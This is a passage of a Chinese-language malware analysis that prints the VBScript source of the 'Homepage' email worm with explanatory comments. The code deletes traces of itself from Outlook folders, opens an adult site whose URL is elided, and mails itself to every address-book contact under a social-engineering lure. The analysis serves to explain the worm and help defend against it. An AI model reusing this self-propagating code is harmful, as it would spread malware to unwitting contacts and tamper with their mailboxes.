'--开始搞破坏,检索Outlook收件箱,将其中
主题
为“Homepage”的邮件全部删除
'--并将“已删除文件夹”清空,同时随机打开四个色情站点中的一个
'--创建一个Outlook应用对象
Set s = CreateObject("Outlook.Application")
Set t = s.GetNameSpace("MAPI")
'--获得“收件箱”
文件夹
对象
Set u = t.GetDefaultFolder(6)
'--下面的循环将指定的邮件全部删除
For I = 1 to u.items.count
If u.Items.Item(i).subject = "Homepage" Then
u.Items.Item(i).close
u.Items.Item(i).delete
End If
Next
'--获得“已删除邮件”文件夹对象
Set u=t.GetDefaultFolder(3)
'--清空已删除邮件,使只彻底消失
For I = 1 to u.items.count
If u.Items.Item(i).subject = "Homepage" Then
u.Items.Item(i).delete
End If
Next
'--随机打开四个色情站点中的一个
'--生成随机数
Randomize
r = Int((4*Rnd)+1)
'--为了
安全
起见,在此,我们省略了具体网站的URL
If r = 1 then WS.Run("http://..../shannon/1.htm")
elseif r=2 Then WS.Run("http://..../_XMCM/prinzje/1.htm")
elseif r=3 Then WS.Run("http://..../amateur/sheila/1.htm")
ElseIf r=4 Then WS.Run("http://..../1.htm")
End If
'--下面向 Outlook 地址簿中的地址发送邮件的函数
Function Mailit()
On Error Resume Next
'--创建一个Outlook应用对象
Set Outlook = CreateObject("Outlook.Application")
If Outlook = "Outlook" Then
Set Mapi=Outlook.GetNameSpace("MAPI")
'--获得邮件地址列表
Set Lists=Mapi.AddressLists
For Each ListIndex In Lists
If ListIndex.AddressEntries.Count <> 0 Then
ContactCount = ListIndex.AddressEntries.Count
'--进行循环发送邮件
For Count= 1 To ContactCount
Set Mail = Outlook.CreateItem(0)
'--创建新邮件
Set Contact = ListIndex.AddressEntries(Count)
'--取邮件地址
Mail.To = Contact.Address
'--设置邮件主题
Mail.Subject = "Homepage"
'--设置邮件
内容
Mail.Body = vbcrlf&"Hi!"&vbcrlf&vbcrlf&"You've got to see this page!
It's really cool ;O)"&vbcrlf&vbcrlf
'--将
病毒
脚本加为附件
Set Attachment=Mail.Attachments
Attachment.Add Folder & "homepage.HTML.vbs"
Mail.DeleteAfterSubmit = True
'--发送邮件
If Mail.To <> "" Then
Mail.Send
'--在注册表中做标记,以防止再次重发
WS.regwrite "HKCUsoftwareAnmailed", "1"
End If
Next
End If
Next
End if
End Function
从以上代码的分析可以看出,“主页”病毒虽然传播性很强,但破坏性不是特别大,它至少没有对用户硬盘上的文件做更改。虽然如此,但它还是具有一般病毒的典型特性,即:复制、传播和破坏,这个病毒和其他的一些 电子 邮件型病毒,例如“库尼科娃”,“爱虫”病毒等,其原理都是大同小异的,理解了这些原理之后,我们就可以找到一些防治这些病毒发作的有效办法。